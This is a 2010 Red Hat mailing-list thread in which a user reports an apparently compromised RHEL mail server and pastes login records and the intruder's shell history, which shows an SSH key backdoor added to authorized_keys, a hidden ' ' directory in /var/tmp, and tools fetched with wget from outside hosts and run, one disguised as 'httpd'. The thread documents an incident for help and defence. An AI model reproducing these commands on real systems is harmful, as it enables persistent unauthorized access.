help
Joy Methew
ml4joy at gmail.com
Thu Jan 28 06:29:44 UTC 2010
still i m thinking how he/she got my password??
On Thu, Jan 28, 2010 at 11:58 AM, Joy Methew <ml4joy at gmail.com> wrote:
> i have changed my root password
>
>
> On Thu, Jan 28, 2010 at 11:44 AM, Wahyu Darmawan <Wahyu.Darmawan at ag-it.com
> > wrote:
>
>> You may change your root password first, and then you can continue to
>> analyze your system.
>>
>> ________________________________________
>> From: redhat-list-bounces at redhat.com [redhat-list-bounces at redhat.com] On
>> Behalf Of Joy Methew [ml4joy at gmail.com]
>> Sent: Thursday, January 28, 2010 12:59 PM
>> To: General Red Hat Linux discussion list
>> Subject: help
>>
>> Hello all,
>> i m using RHEL5.3 as a my mail server with real ip.i
>> configure my system mostly remotely.last login time of my system 27 jan
>> from this ip 118.129.153.43.
>> than i try to login at 28 jan in morning so i can`t got authentication as
>> root from my last password.
>> than i reboot the system reset my password.
>> i login as a root than i run "last" command i m sending tha first 10 lines
>> of last command...i thinks someone hack my system.i am sending history
>> command output.
>> now i remove .ssh directory and /var/tmp/*
>>
>> please suggest wat is this??
>>
>> thanks
>>
>> last command out put:
>> root pts/1 117.199.118.234 Thu Jan 28 10:58 still logged in
>> root pts/0 117.199.118.234 Thu Jan 28 10:49 still logged in
>> root tty1 Thu Jan 28 10:48 - 10:52 (00:04)
>> reboot system boot 2.6.18-128.el5PA Thu Jan 28 10:45 (00:25)
>> root pts/2 165.red-79-153-1 Thu Jan 28 01:42 - 01:52 (00:09)
>> root pts/2 165.red-79-153-1 Wed Jan 27 23:02 - 01:27 (02:25)
>> root pts/2 165.red-79-153-1 Wed Jan 27 22:33 - 22:34 (00:00)
>> root pts/3 165.red-79-153-1 Wed Jan 27 22:32 - 22:33 (00:00)
>> root pts/2 118.129.153.43 Wed Jan 27 22:31 - 22:32 (00:01)
>> root pts/2 117.199.114.189 Wed Jan 27 15:47 - 15:51 (00:03)
>>
>> What is 165.red-79........this is nt my ip.
>>
>>
>> History Output
>>
>> 115 cat /proc/cpuinfo
>> 116 mkdir .ssh
>> 117 cd .ssh
>> 118 echo ssh-rsa
>>
>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600
>> ~/.ssh/authorized_keys
>> 119 cd /var/tmp
>> 120 mkdir " "
>> 121 cd " "
>> 122 passwd
>> 123 echo ssh-rsa
>>
>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600
>> ~/.ssh/authorized_keys
>> 124 ps -x
>> 125 cd /var/tmp
>> 126 w
>> 127 wget http://kok.ucoz.de/gosh.tgz
>> 128 tar xvf gosh.tgz
>> 129 cd gosh
>> 130 chmod +x *
>> 131 ./go.sh 121
>> 132 w
>> 133 ps -x
>> 134 ps -aux
>> 135 cd /var/tmp
>> 136 cd " "
>> 137 ls -a
>> 138 wget http://helpbnc.myftp.org/danger/fld.tgz
>> 139 tar xzvf fld.tgz
>> 140 cd fld
>> 141 chmod +x *
>> 142 nano cyc.acc
>> 143 nano cyc.acc.1
>> 144 nano cyc.set
>> 145 ./httpd
>> 146 w
>> --
>> redhat-list mailing list
>> unsubscribe mailto:redhat-list-request at redhat.com?subject=unsubscribe
>> https://www.redhat.com/mailman/listinfo/redhat-list
>>
>> --
>> redhat-list mailing list
>> unsubscribe mailto:redhat-list-request at redhat.com?subject=unsubscribe
>> https://www.redhat.com/mailman/listinfo/redhat-list
>>
>
>
More information about the redhat-list
mailing list